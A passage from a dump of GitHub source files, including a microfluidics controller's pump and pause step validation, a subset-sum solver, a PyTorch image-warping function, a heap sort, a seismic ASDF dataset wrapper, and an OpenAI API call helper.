ints.\r\n # iters - tuple of loop iterations. None if the step is not inside a loop. The iteration of the immediate loop\r\n # is stored in i[0], the first outer loop in i[1], and the nth outer loop in i[n].\r\n # Output: None\r\n def saveEntries(self, type=\"int\", iters=None):\r\n rate = self.rate.get()\r\n cycles = self.nCycles.get()\r\n\r\n # Check if valve entries are ok for all loop iterations.\r\n valves = []\r\n allInt = True\r\n for v in self.valveEntries:\r\n v0 = v.get()\r\n valves.append(v0)\r\n try:\r\n v1 = int(v0)\r\n if v1 not in self.btndict:\r\n raise ValueError(v0 + \" in pump step is not a valid valve. Valid valves are \" +\r\n self.btndict[\"AvailablePinsStatement\"] + \".\")\r\n v.expression = False\r\n except:\r\n if not iters:\r\n raise ValueError(v0 + \" in pump step is not a valid valve. Valid valves are \" +\r\n self.btndict[\"AvailablePinsStatement\"] + \".\")\r\n else: #check if valid expression fo valve\r\n self.recursiveIterCheck(iters, v0, self.checkValidValveEntry, ())\r\n v.expression = True\r\n allInt = False\r\n if allInt:\r\n if len(set(valves)) < 3:\r\n raise ValueError(\"There are duplicate valve entries\")\r\n else:\r\n self.recursiveIterCheck(iters, valves, self.checkDuplicateValves, ())\r\n\r\n try:\r\n rate1 = int(rate)\r\n if rate1 < 0:\r\n raise ValueError(rate + \" is not a valid rate for a pump step. Rates must be positive integers.\")\r\n self.rate.expression = False\r\n except:\r\n if not iters:\r\n raise ValueError(rate + \" is not a valid rate for a pump step. 
Rates must be positive integers.\")\r\n            self.rate.expression = False\r\n        except:\r\n            if not iters:\r\n                raise ValueError(rate + \" is not a valid rate for a pump step. Rates must be positive integers.\")\r\n            else: #check if valid expression.\r\n                self.recursiveIterCheck(iters, rate, self.checkValidRate, ())\r\n                self.rate.expression = True\r\n\r\n        try:\r\n            try:\r\n                cycles1 = int(cycles)\r\n            except:\r\n                if not iters:\r\n                    raise ValueError(\r\n                        cycles + \" is not a valid number of cycles for a pump step. The number of cycles must\"\r\n                        \" be either a positive integer or -1 to pump indefinitely until interrupted.\")\r\n                else: # check if valid expression\r\n                    self.recursiveIterCheck(iters, cycles, self.checkValidCycles, ())\r\n                    self.nCycles.expression = True\r\n                    Step.saveEntries(self, type=\"int\", iters=iters)\r\n                    return\r\n\r\n            if cycles1 == -1:\r\n                if iters:\r\n                    raise ValueError(\"Pump steps can pump indefinitely only if they\"\r\n                                     \" are the final step in a protocol.\")\r\n                else:\r\n                    if hasattr(self, 'last') and not self.last:\r\n                        raise ValueError(\"Pump steps can pump indefinitely only if they\"\r\n                                         \" are the final step in a protocol.\")\r\n\r\n\r\n            if cycles1 < -1:\r\n                if iters:\r\n                    raise ValueError(\r\n                        cycles + \" is not a valid number of cycles for a pump step. The number of cycles must be\"\r\n                        \" a positive integer.\")\r\n                else:\r\n                    raise ValueError(\r\n                        cycles + \" is not a valid number of cycles for a pump step. The number of cycles must be\"\r\n                        \" a positive integer, or -1 on the final step of a protocol to pump indefinitely.\")\r\n            self.nCycles.expression = False\r\n        except ValueError as E:\r\n            raise E\r\n\r\n        Step.saveEntries(self, type = \"int\", iters = iters)\r\n\r\n    # PumpStep.checkValidRate: If pumpstep is in a loop and has an expression entry for rate as a function of the loop\r\n    # iteration, checkValidRate checks whether the expression evaluates to a valid rate on the given iteration.\r\n    # Input:\r\n    #   input - Expression for the rate\r\n    #   i - tuple of iterations for each outer loop. The immediate outer loop is in the first position, the\r\n    #       outer-most loop is in the last position.\r\n    # Output: None, but throws an error if invalid.\r\n    def checkValidRate(self, input, i):\r\n        try:\r\n            rate = eval(input, {}, {'i' : i})\r\n        except:\r\n            raise ValueError(input + \" is not a valid rate for a pump step. Rates must be positive integers or, in a \"\r\n                             \"loop, python expressions evaluating to positive integers.\" + self.NestingRuleStatement)\r\n        if type(rate) != int or rate < 1:\r\n            raise ValueError(input + \" is not a valid rate for a pump step. Rates must be positive integers or, in a \"\r\n                             \"loop, python expressions evaluating to positive integers.\" + self.NestingRuleStatement)\r\n\r\n    # PumpStep.checkValidCycles: If pumpstep is in a loop and has an expression entry for number of cycles as a function\r\n    # of the loop iteration, checkValidCycles checks whether the expression evaluates to a valid number of cycles on\r\n    # the given iteration.\r\n    # Input:\r\n    #   input - Expression for the number of cycles\r\n    #   i - tuple of iterations for each outer loop. The immediate outer loop is in the first position, the\r\n    #       outer-most loop is in the last position.\r\n    # Output: None, but throws an error if invalid.\r\n    def checkValidCycles(self, input, i):\r\n        try:\r\n            cycles = eval(input, {}, {'i' : i})\r\n        except:\r\n            raise ValueError(input + \" is not a valid number of cycles for a pump step. The number of cycles must be\"\r\n                             \" a positive integer.\")\r\n        if cycles == -1:\r\n            raise ValueError(\"You cannot pump indefinitely inside a loop. \" + input + \" in pump step evaluates to -1 on\"\r\n                             \" iteration \" + self.iterToString(i) + \".\")\r\n        if type(cycles) != int or cycles < 1:\r\n            raise ValueError(\"Number of cycles \" + input + \" evaluates to \" + str(cycles) + \" on iteration \"\r\n                             + self.iterToString(i) + \". The number of cycles must be a positive integer.\")\r\n\r\n\r\n    # PumpStep.specifyPump: Create pump object using a ValveControllerObject. Set upon instantiation of ValveController\r\n    # in KATARAGUI.connect.\r\n    # Inputs:\r\n    #   v1 - the first valve in the peristaltic pump\r\n    #   v2 - the second valve in the peristaltic pump\r\n    #   v3 - the third valve in the peristaltic pump\r\n    # Output:\r\n    #   returns KATARAPump Object\r\n    def specifyPump(self, v1, v2, v3):\r\n        raise NotImplementedError(\"Error: PumpStep.specifyPump must be set upon initialization of the device.\")\r\n\r\n    # PumpStep.changeValveColor: Changes the color of the valve button while the pump is running.\r\n    # Input:\r\n    #   color - the color to change the valve button to.\r\n    # Output: None\r\n    def changeValveColor(self, color):\r\n        for v in self.pump.valves:\r\n            Step.btndict[int(v)].config(bg=color)\r\n\r\n    # PumpStep.cleanup: Resets GUI after finishing pump sequence.\r\n    # Inputs: None\r\n    # Outputs: None\r\n    def cleanup(self): #call this method if a protocol is canceled in the middle of a pump step\r\n        self.pump.ctlr.ser.write(\"c\")\r\n        self.changeValveColor(\"gray\")\r\n\r\n    # PumpStep.run: runs the pump sequence.\r\n    # Inputs:\r\n    #   iters - tuple of loop iterations. None if the step is not inside a loop. The iteration of the immediate loop\r\n    #           is stored in i[0], the first outer loop in i[1], and the nth outer loop in i[n].\r\n    #   time - time to pause thread while the pump sequence is running.\r\n    # Outputs: None\r\n    #def run(self, cleanup = None, iter = None, time = None):\r\n    def run(self, iter=None, time=None):\r\n        i = iter\r\n\r\n        valves = []\r\n        for v in self.valveEntries:\r\n            if v.expression:\r\n                valves.append(eval(v.saved, {}, {'i' : i}))\r\n            else:\r\n                valves.append(v.saved)\r\n        self.pump = self.specifyPump(valves[0], valves[1], valves[2])\r\n        ValveController.pPumps.remove(self.pump)\r\n        self.changeValveColor(\"Blue\")\r\n        if self.nCycles.expression:\r\n            nCycles = eval(self.nCycles.saved, {}, {'i' : i})\r\n        else:\r\n            nCycles = self.nCycles.saved\r\n        if self.rate.expression:\r\n            rate = eval(self.rate.saved, {}, {'i' : i})\r\n        else:\r\n            rate = self.rate.saved\r\n        self.pump.forward(rate, nCycles)\r\n        if nCycles == -1:\r\n            Step.pause(self, float('Inf'), cleanup=self.cleanup)\r\n        else:\r\n            Step.pause(self, float(nCycles)/float(rate), cleanup=self.cleanup)\r\n        Step.pause(self, time, cleanup = self.cleanup)\r\n        self.changeValveColor(\"gray\")\r\n\r\n    # PumpStep.checkValidValveEntry: If PumpStep is in a loop and has an expression entry for a valve as a function\r\n    # of the loop iteration, checkValidValveEntry checks whether the expression evaluates to a valid valve on\r\n    # the given iteration.\r\n    # Input:\r\n    #   input - Expression for the valve\r\n    #   i - tuple of iterations for each outer loop. 
The immediate outer loop is in the first position, the\r\n    #       outer-most loop is in the last position.\r\n    # Output: None, but throws an error if invalid.\r\n    def checkValidValveEntry(self, valve, i):\r\n        expr = valve  # keep the raw expression for error messages\r\n        try:\r\n            valve = eval(valve, {}, {'i': i})\r\n            print(i, valve)\r\n        except:\r\n            self.checkIfHasi(expr)\r\n            raise ValueError(\"Valve entry must either be an available valve or a valid python expression \"\r\n                             \"evaluating to an available valve. Available valves are \"\r\n                             + self.btndict[\"AvailablePinsStatement\"] + \". \" + Step.NestingRuleStatement)\r\n        if valve not in self.btndict or type(valve) != int or valve < 1:\r\n            raise ValueError(\"Valve entry \" + expr + \" evaluates to \" + str(valve) + \" on iteration \"\r\n                             + self.iterToString(i) + \". Available valves are \" + self.btndict[\r\n                \"AvailablePinsStatement\"])\r\n\r\n    # PumpStep.checkDuplicateValves: Checks if expressions for valves evaluate to duplicates on a given loop iteration.\r\n    # Inputs:\r\n    #   valves - list of valves to evaluate\r\n    #   i - the iteration of all outer loops.\r\n    # Outputs: None\r\n    def checkDuplicateValves(self, valves, i):\r\n        evaledValves = []\r\n        for v in valves:\r\n            evaledValves.append(eval(v, {}, {'i':i}))\r\n        if len(set(evaledValves)) < 3:\r\n            raise ValueError(\"There are duplicate valves on iteration \" + self.iterToString(i))\r\n\r\n# Pauses a protocol\r\nclass PauseStep(Step):\r\n    parameter = \"Pause\"\r\n    # PauseStep.__init__: initializes PauseStep\r\n    # Input:\r\n    #   _super - parent Tkinter frame object in which to draw PauseStep instance\r\n    # Output: None\r\n    def __init__(self, _super): # super is a reference to the procedure holding the item instance\r\n        Step.__init__(self, _super)\r\n        self.steptype = \"PauseStep\"\r\n        self.time = LabelEntry(self.box, 0, 0, \"Time (s):\")\r\n        self.time.expression = None\r\n        self.entries.append(self.time)\r\n\r\n    # PauseStep.saveEntries: Save user entered time value for running or writing to file.\r\n    # Inputs:\r\n    #   type - data types accepted - float for PauseStep\r\n    #   iters - tuple of loop iterations. None if the step is not inside a loop. The iteration of the immediate loop\r\n    #           is stored in i[0], the first outer loop in i[1], and the nth outer loop in i[n].\r\n    # Output: None\r\n    def saveEntries(self, type = \"float\", iters = None):\r\n        timeEntry = self.time.get()\r\n        if not iters:\r\n            time = float(timeEntry)\r\n            if time < 0:\r\n                raise ValueError(\r\n                    \"Invalid pause time: \" + timeEntry + \"; you cannot pause for a negative amount of time.\")\r\n            self.time.expression = False\r\n        else:\r\n            self.recursiveIterCheck(iters, timeEntry, self.inputCheckForPause, ())\r\n            self.time.expression = True\r\n        Step.saveEntries(self)\r\n\r\n    # PauseStep.inputCheckForPause: If PauseStep is in a loop and has an expression entry for a pause time as a function\r\n    # of the loop iteration, inputCheckForPause checks whether the expression evaluates to a valid time on\r\n    # the given iteration.\r\n    # Input:\r\n    #   input - Expression for the pause time\r\n    #   i - tuple of iterations for each outer loop. 
The immediate outer loop is in the first position, the\r\n    #             outer-most loop is in the last position.\r\n    # Output: None, but throws an error if invalid.\r\n    def inputCheckForPause(self, expression, i):\r\n        try:\r\n            time = eval(expression, {}, {'i' : i})\r\n        except:\r\n            self.checkIfHasi(expression)\r\n            raise ValueError(\"Expression \" + expression + \" in Pause step does not evaluate to a positive float on \"\r\n                             \"iteration \" + self.iterToString(i) + \".\")\r\n        if (type(time) != float and type(time) != int) or time < 0:\r\n            raise ValueError(\"Cannot pause for \" + expression + \" seconds on iteration \" + self.iterToString(i)\r\n                             + \". You can only pause for a positive integer or float number of seconds.\")\r\n\r\n\r\n\r\n    # Step.run pauses the protocol. The function is still called run to allow duck typing.\r\n    # Input:\r\n    #   cleanup - function to cleanup after step: None for Step.run\r\n    #   iter - tuple of the iterations for each outer loop. The immediate outer loop is in the first\r\n    #          position, the outer-most loop is in the last position.\r\n    # Output: None\r\n    def run(self, iter = None):\r\n        i = iter\r\n        if self.time.expression:\r\n            runtime = eval(self.time.saved, {}, {'i' : i})\r\n        else:\r\n            runtime = self.time.saved\r\n        Step.pause(self, runtime)\r\n","repo_name":"jonathanawhite1381/KATARA-Microfluidics-Controller","sub_path":"Code/KATARA_Software/StepDerivatives.py","file_name":"StepDerivatives.py","file_ext":"py","file_size_in_byte":27187,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"5127187389","text":"s = input().split()\nl = len(s)\nfor i in range(l):\n    s[i] = int(s[i])\n\nd = int(input())\n\ns.append(d)\nsum = sum(s)\nl = len(s)\n\ntabela = []\nfor i in range(sum//2 + 1):\n    tabela.append([])\n    for j in range(l + 1):\n        tabela[i].append(-1)\n        if(i == 0):\n            tabela[i][j] = 1\n        if(i!=0 and j==0):\n            tabela[i][j] = 0\n\nif (sum % 2 == 1):\n    print(\"No\")\nelse:\n    for i in range(sum//2 + 1):\n        tabela[i][0] = 0\n    for j in range(l + 1):\n        tabela[0][j] = 1\n    \n    for i in range(1, sum//2 +1):\n        for j in range(1, l + 1):\n            tabela[i][j] = tabela[i][j-1]\n            if(i >= s[j-1]):\n                if(tabela[i][j] < tabela[i - s[j-1]][j-1]):\n                    tabela[i][j] = tabela[ i - s[j-1] ][j-1]\n\n    if(tabela[sum//2][l] == 1):\n        print(\"Yes\")\n    else:\n        print(\"No\")\n","repo_name":"LucasSSales/Codigos-de-PAA","sub_path":"Dynamic Programming/Subconjuntos_complementares.py","file_name":"Subconjuntos_complementares.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30894422877","text":"import numpy as np\nimport torch\n\n\n\ndef warping(image, flow):\n\n    B, C, H, W = image.size()\n\n\n    image_inds = torch.arange(H * W, dtype=torch.int64)\n    image_inds = image_inds.repeat(B, 1)\n\n    has_flow = torch.sum(torch.abs(flow), dim=1, dtype=torch.bool).view((B, H*W))\n    warped_inds = torch.zeros((B, H*W), dtype=torch.int64)\n\n    warped_inds[has_flow] += image_inds[has_flow]\n\n    flow_ind_shift = torch.tensor((flow[:, 0, :, :] * H + flow[:, 1, :, :]),\n                                  dtype=torch.int64).view(B, H*W)\n    warped_inds[has_flow] += flow_ind_shift[has_flow]\n\n\n    # batch offset\n    offset = torch.cat([torch.ones(H*W, dtype=torch.int64) * H*W*i for i in range(B)]).view((B, H*W))\n    warped_inds = torch.flatten(warped_inds + offset)\n    image_inds = torch.flatten(image_inds + offset)\n\n    warped_im = torch.zeros((B, C, H, W))\n    for channel in (0, 1, 2):\n        im_channel = torch.flatten(image[:, channel, 
:, :])\n warped_channel = torch.flatten(warped_im[:, channel, :, :])\n warped_channel[warped_inds] = im_channel[image_inds]\n warped_im[:, channel, :, :] = warped_channel.view((B, H, W))\n\n return warped_im\n\n\n\n\n\nif __name__ == '__main__':\n flow = torch.zeros((5, 2, 10, 10))\n images = torch.zeros((5, 3, 10, 10))\n\n images[:, :, 0, 0] = 1\n flow[:, 0, 0, 0] = 4\n flow[:, 1, 0, 0] = 1\n\n images[:, :, 1, 1] = 3\n flow[:, 0, 1, 1] = 1\n flow[:, 1, 1, 1] = 1\n\n warped_images = warping(images, flow)\n print(warped_images[0, 0, :, :].detach().numpy())\n print(warped_images.max())","repo_name":"alexander-paskal/flowbots","sub_path":"new_warping.py","file_name":"new_warping.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5990626147","text":"#! /usr/bin/env python3\n#\n\nimport sys\n\ndef check_line(n):\n line = sys.stdin.readline().strip('\\n')\n splitted = line.split()\n assert all(s == \"0\" or not s.startswith(\"0\") for s in splitted), \\\n \"leading 0 detected\"\n integers = [int(e) for e in splitted]\n assert len(integers) == n\n for e in integers:\n assert e >= 0\n assert e <= 1000000000\n assert sorted(integers) == integers\n # Check no dups:\n dups = []\n for i in range(len(integers)):\n if i == 0: continue\n if integers[i - 1] == integers[i]: dups.append(integers[i])\n assert len(dups) == 0, 'Dup: %s' % dups\n\n\nif __name__ == '__main__':\n N = int(sys.stdin.readline().strip('\\n'))\n M = int(sys.stdin.readline().strip('\\n'))\n assert N >= 1\n assert N <= 2000\n assert M >= 1\n assert M <= 2000\n check_line(N)\n check_line(M)\n assert len(sys.stdin.readline()) == 0\n sys.exit(42)\n","repo_name":"romeorizzi/SWERC_2_CMS","sub_path":"swerc_original/cakeymccakeface/input_format_validators/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74243200193","text":"# heap.py\n# -*- coding: utf-8 -*-\n\nclass heap:\n '''\n 堆是一棵顺序存储的完全二叉树。\n\n 其中每个结点的关键字都不大于其孩子结点的关键字,这样的堆称为小根堆。\n\n 其中每个结点的关键字都不小于其孩子结点的关键字,这样的堆称为大根堆。\n\n 堆排序\n (1)根据初始数组去构造初始堆(构建一个完全二叉树,保证所有的父结点都比它的孩子结点数值大)。\n\n (2)每次交换第一个和最后一个元素,输出最后一个元素(最大值),然后把剩下元素重新调整为大根堆。\n\n 时间复杂度:平均 nlog(n),最坏 nlog(n),最好 nlog(n),不稳定\n '''\n\n def __init__(self, reverse=False):\n self.reverse = reverse\n\n def swap(self, arr, a, b):\n temp = arr[a]\n arr[a] = arr[b]\n arr[b] = temp\n\n def buildHeap_min(self, arr, i, len):\n # 最小堆的实现\n k = 2 * i + 1\n temp = arr[i]\n while (k < len):\n if k + 1 < len:\n # 从左子节点往右子节点扫描\n if arr[k] > arr[k + 1]:\n k = k + 1\n # 从子节点往父节点扫描,子节点与父节点值替换\n if arr[k] < temp:\n self.swap(arr, i, k)\n i = k\n else:\n break\n k = 2 * k + 1\n\n return arr\n\n def buildHeap_max(self, arr, i, len):\n # 最大堆的实现\n k = 2 * i + 1\n temp = arr[i]\n while (k < len):\n if k + 1 < len:\n if arr[k] < arr[k + 1]:\n k = k + 1\n\n if arr[k] > temp:\n self.swap(arr, i, k)\n i = k\n else:\n break\n k = 2 * k + 1\n\n return arr\n\n def sorted(self, arr):\n\n # 初始化堆,\n for i in range(int(len(arr) / 2) - 1, -1, -1):\n if self.reverse == False:\n self.buildHeap_max(arr, i, len(arr))\n else:\n self.buildHeap_min(arr, i, len(arr))\n\n # 每次循环取出当前堆中最小或最大值,与数组最后一个元素交换\n for j in range(len(arr) - 1, 0, -1):\n\n self.swap(arr, 0, j)\n\n if self.reverse == False:\n self.buildHeap_max(arr, 0, j)\n else:\n self.buildHeap_min(arr, 0, j)\n\n return arr\n\n\nif __name__ == '__main__':\n arr = [7, 2, 3, 10, 4, 40, 2, 
10.1, 0, -99, 41, 9]\n m = heap(True)\n re = m.sorted(arr)\n print(re)\n","repo_name":"LDongning/Sorting-Algorithms","sub_path":"heap.py","file_name":"heap.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"5141390461","text":"import sys\nimport steamlink\nimport xbmcaddon\n\n# Configure addon\naddon = xbmcaddon.Addon()\n\nif (__name__ == '__main__'):\n if (len(sys.argv) -1 >= 1):\n if (sys.argv[1] == \"update\"):\n steamlink.update(addon)\n else:\n steamlink.launch(addon)","repo_name":"meekys/plugin.program.steamlink","sub_path":"addon.py","file_name":"addon.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35469233245","text":"\"\"\"\nDescription:\n Wrapper Class for providing fast access to data contained within a set of ASDF files\n\nReferences:\n\nCreationDate: 12/12/18\nDeveloper: rakib.hassan@ga.gov.au\n\nRevision History:\n LastUpdate: 12/12/18 RH\n LastUpdate: 2020-04-10 Fei Zhang clean up + added example run for the script\n\"\"\"\n\nfrom collections import defaultdict\n\n# from mpi4py import MPI\nimport numpy as np\nfrom scipy.spatial import cKDTree\n\nfrom seismic.ASDFdatabase._FederatedASDFDataSetImpl import _FederatedASDFDataSetImpl\nfrom seismic.ASDFdatabase.utils import rtp2xyz\n\n\nclass FederatedASDFDataSet():\n def __init__(self, asdf_source, logger=None, single_item_read_limit_in_mb=1024):\n \"\"\"\n Initializer for FederatedASDFDataSet.\n\n :param asdf_source: Path to a text file containing a list of ASDF files. \\\n Entries can be commented out with '#'\n :param logger: logger instance\n \"\"\"\n self.logger = logger\n self.asdf_source = asdf_source\n self._unique_coordinates = None\n self._earth_radius = 6371 # km\n\n # Instantiate implementation class\n self.fds = _FederatedASDFDataSetImpl(asdf_source, logger=logger,\n single_item_read_limit_in_mb=single_item_read_limit_in_mb)\n\n # Populate coordinates\n self._unique_coordinates = defaultdict(list)\n\n rtps_dict = defaultdict()\n for ds_dict in self.fds.asdf_station_coordinates:\n for key in list(ds_dict.keys()):\n self._unique_coordinates[key] = [ds_dict[key][0], ds_dict[key][1]]\n\n rtps_dict[key] = [self._earth_radius,\n np.radians(90 - ds_dict[key][1]),\n np.radians(ds_dict[key][0])]\n # end for\n # end for\n\n rtps_list = []\n for k in list(rtps_dict.keys()):\n rtps_list.append(rtps_dict[k])\n # end for\n rtps = np.array(rtps_list)\n xyzs = rtp2xyz(rtps[:, 0], rtps[:, 1], rtps[:, 2])\n\n self._tree = cKDTree(xyzs)\n self._key_list = np.array(list(rtps_dict.keys()))\n\n # end func\n\n @property\n def unique_coordinates(self):\n \"\"\"\n\n :return: dictionary containing [lon, lat] coordinates indexed by 'net.sta'\n \"\"\"\n return self._unique_coordinates\n\n # end func\n\n def get_closest_stations(self, lon, lat, nn=1):\n \"\"\"\n\n :param lon: longitude (degree)\n :param lat: latitude (degrees)\n :param nn: number of closest stations to fetch\n :return: A tuple containing a list of closest 'network.station' names and a list of distances\n (in ascending order) in kms\n \"\"\"\n assert nn > 0, 'nn must be > 0'\n\n xyz = rtp2xyz(np.array([self._earth_radius]),\n np.array([np.radians(90 - lat)]),\n np.array([np.radians(lon)]))\n d, l = self._tree.query(xyz, nn)\n\n if isinstance(l, int):\n l = [l]\n\n if (len(d.shape) == 1):\n d = np.expand_dims(d, axis=0)\n\n l = l[l < len(self.unique_coordinates)]\n\n if 
isinstance(l, int):\n l = [l]\n\n return (list(self._key_list[l]), d[0, :len(l)])\n\n # end func\n\n def get_global_time_range(self, network, station, location=None, channel=None):\n \"\"\"\n :param network: network code\n :param station: station code\n :param location: location code (optional)\n :param channel: channel code (optional)\n :return: tuple containing min and max times as UTCDateTime objects. If no matching records are found\n min is set to 2100-01-01T00:00:00.000000Z and max is set to 1900-01-01T00:00:00.000000Z\n \"\"\"\n\n return self.fds.get_global_time_range(network, station, location=location, channel=channel)\n\n # end func\n\n def get_stations(self, starttime, endtime, network=None, station=None, location=None, channel=None):\n \"\"\"\n :param starttime: start time string in UTCDateTime format; can also be an instance of obspy.UTCDateTime\n :param endtime: end time string in UTCDateTime format; can also be an instance of obspy.UTCDateTime\n :param network: network code (optional)\n :param station: station code (optional)\n :param location: location code (optional)\n :param channel: channel code (optional)\n\n :return: a list containing [net, sta, loc, cha, lon, lat] in each row\n \"\"\"\n results = self.fds.get_stations(starttime, endtime, network, station, location, channel)\n return results\n\n # end func\n\n def get_waveform_count(self, network, station, location, channel, starttime,\n endtime):\n \"\"\"\n Count the number of traces within the given parameters of network, station, etc..\n and date range. This is a fast method of determing whether any trace data exists\n in a given time period, if you don't actually need the waveform data itself.\n\n :param network: network code\n :param station: station code\n :param location: location code\n :param channel: channel code\n :param starttime: start time string in UTCDateTime format; can also be an instance of obspy.UTCDateTime\n :param endtime: end time string in UTCDateTime format; can also be an instance of obspy.UTCDateTime\n :return: The number of streams containing waveform data over the time-range provided\n \"\"\"\n return self.fds.get_waveform_count(network, station, location, channel,\n starttime, endtime)\n\n # end func\n\n def get_waveforms(self, network, station, location, channel, starttime,\n endtime, trace_count_threshold=200):\n \"\"\"\n :param network: network code\n :param station: station code\n :param location: location code\n :param channel: channel code\n :param starttime: start time string in UTCDateTime format; can also be an instance of obspy.UTCDateTime\n :param endtime: end time string in UTCDateTime format; can also be an instance of obspy.UTCDateTime\n :param trace_count_threshold: returns an empty Stream if the number of traces within the time-range provided\n exceeds the threshold (default 200). This is particularly useful for filtering\n out data from bad stations, e.g. those from the AU.Schools network\n :return: an obspy.Stream containing waveform data over the time-rage provided\n \"\"\"\n s = self.fds.get_waveforms(network, station, location, channel, starttime,\n endtime, trace_count_threshold)\n return s\n\n # end func\n\n def local_net_sta_list(self):\n \"\"\"\n This function provides an iterator over the entire data volume contained in all the ASDF files listed in the\n text file during instantiation. 
When FederatedASDFDataSet is instantiated in an MPI-parallel environment,\n meta-data for the entire data volume are equally partitioned over all processors -- in such instances, this\n function provides an iterator over the data allocated to a given processor. This functionality underpins\n parallel operations, e.g. picking arrivals.\n\n :return: tuples containing [net, sta, start_time, end_time]; start- and end-times are instances of obspy.UTCDateTime\n \"\"\"\n for item in self.fds.local_net_sta_list():\n yield item\n # end for\n # end func\n\n\n# end class\n\nif __name__ == \"__main__\":\n \"\"\"\n How to Run Example::\n\n python ASDFdatabase/FederatedASDFDataSet.py /Datasets/asdf_file_index.txt\n\n Upon success, a db file will be created: /Datasets/f374ca9e7dd8abd2a1d58575e0d55520f30ffc23.db\n \"\"\"\n import sys\n from seismic.ASDFdatabase.FederatedASDFDataSet import FederatedASDFDataSet\n\n if len(sys.argv) < 2:\n print(\"******** USAGE: python3 %s %s **********\"% (sys.argv[0], \"asdf_file_list_txt\"))\n sys.exit(1)\n\n asdf_file_list = sys.argv[1]\n ds = FederatedASDFDataSet(asdf_file_list)\n","repo_name":"Ao-Chang/HiperSeis","sub_path":"seismic/ASDFdatabase/FederatedASDFDataSet.py","file_name":"FederatedASDFDataSet.py","file_ext":"py","file_size_in_byte":8210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4187686053","text":"import turtle\r\nwn=turtle.Screen()\r\nt1=turtle.Turtle()\r\ngeo=open(\"geo.txt\",'r')\r\ndist=100\r\nfor line in geo:\r\n\tif line.count('name')>0:\r\n\t\tfname=line[5:]\r\n\telif line.count('go')>0:\r\n\t\tt1.fd(dist)\r\n\telif line.count('right')>0:\r\n\t\tt1.right(int(line[6:]))\r\n\telif line.count('left')>0:\r\n\t\tt1.left(int(line[5:]))\r\n\telif line.count('loc')>0:\r\n\t\tloc=line[4:]\r\n\t\tcountdown=0\r\n\t\tfor word in loc.split():\r\n\t\t\tif countdown%2==0:\r\n\t\t\t\t\tx=int(word)\r\n\t\t\t\t\tcountdown=countdown+1\r\n\t\t\telse:\r\n\t\t\t\t\ty=int(word)\r\n\t\t\t\t\tt1.goto(x,y)\r\n\t\t\t\t\tcountdown=countdown+1\r\ngeo.close()\r\nraw_input()","repo_name":"HeeTa/p1_201611078","sub_path":"w12/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"29444510191","text":"import sys\nimport frontend.parser as par\nimport errors\nfrom backend.llvm.translator import translate_program\nfrom backend.llvm.optimizer import optimize_program\n\ndef main():\n c = (len(sys.argv) > 1 and sys.argv[1] == 'c')\n text = ''.join(sys.stdin.readlines())\n\n try:\n program = par.parse(text)\n program.check()\n except errors.CompilerError as err:\n print(f'ERROR\\n{err}\\n', file=sys.stderr)\n exit(1)\n return\n\n if c:\n noopts = (len(sys.argv) > 2 and sys.argv[2] == 'noopts')\n llvm = translate_program(program)\n if not noopts:\n optimize_program(llvm)\n print(llvm)\n else:\n print(f'OK\\n', file=sys.stderr)\n print(program)\n\n exit(0)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"morch1/latte-compiler","sub_path":"src/compiler.py","file_name":"compiler.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14240173016","text":"import openai\nimport os\nimport subprocess\nimport time\n\n\nOPENAI_API_MODEL = os.getenv('OPENAI_API_MODEL')\nOPENAI_TEMPERATURE = os.getenv('OPENAI_TEMPERATURE')\n\n\ndef get_ada_embedding(text):\n text = text.replace(\"\\n\", \" \")\n return 
openai.Embedding.create(input=[text], model=\"text-embedding-ada-002\")[\"data\"][0][\"embedding\"]\n\n\ndef openai_call(\n    prompt: str,\n    model: str = OPENAI_API_MODEL,\n    temperature: float = OPENAI_TEMPERATURE,\n    max_tokens: int = 200,\n):\n    while True:\n        try:\n            if model.startswith(\"llama\"):\n                # Spawn a subprocess to run llama.cpp\n                # Note: passing an argument list together with shell=True would drop\n                # the arguments on POSIX, so the list is handed to run() directly.\n                cmd = [\"llama/main\", \"-p\", prompt]\n                result = subprocess.run(cmd, stderr=subprocess.DEVNULL, stdout=subprocess.PIPE, text=True)\n                return result.stdout.strip()\n            elif not model.startswith(\"gpt-\"):\n                # Use completion API\n                response = openai.Completion.create(\n                    engine=model,\n                    prompt=prompt,\n                    temperature=temperature,\n                    max_tokens=max_tokens,\n                    top_p=1,\n                    frequency_penalty=0,\n                    presence_penalty=0,\n                )\n                return response.choices[0].text.strip()\n            else:\n                # Use chat completion API\n                messages = [{\"role\": \"system\", \"content\": prompt}]\n                response = openai.ChatCompletion.create(\n                    model=model,\n                    messages=messages,\n                    temperature=temperature,\n                    max_tokens=max_tokens,\n                    n=1,\n                    stop=None,\n                )\n                return response.choices[0].message.content.strip()\n        except openai.error.RateLimitError:\n            print(\n                \"The OpenAI API rate limit has been exceeded. Waiting 10 seconds and trying again.\"\n            )\n            time.sleep(10)  # Wait 10 seconds and try again\n        else:\n            break\n","repo_name":"b-chase/toddleragi","sub_path":"ai_responses.py","file_name":"ai_responses.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"}\n{"seq_id":"2251450890","text":"import math\nfrom collections import Counter\n\ndef solution(progresses, speeds):\n    # Keep the state local so repeated calls to solution() start fresh\n    days = []\n    for i in range(len(progresses)):\n        left = 100 - progresses[i]\n        if i == 0 or left 